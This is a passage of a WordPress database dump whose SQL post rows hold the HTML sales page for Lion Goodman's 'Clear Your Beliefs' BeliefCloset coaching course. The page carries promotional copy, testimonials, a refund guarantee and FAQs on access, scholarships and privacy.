/>In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n<div style="text-align: right;"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'copy of cyb', '', 'inherit', 'closed', 'open', '', '936-revision-v1', '', '', '2014-06-17 17:03:00', '2014-06-17 22:03:00', '', 936, 'http://clearyourbeliefs.com/936-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(937, 4194, '2014-06-17 16:35:33', '2014-06-17 21:35:33', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs 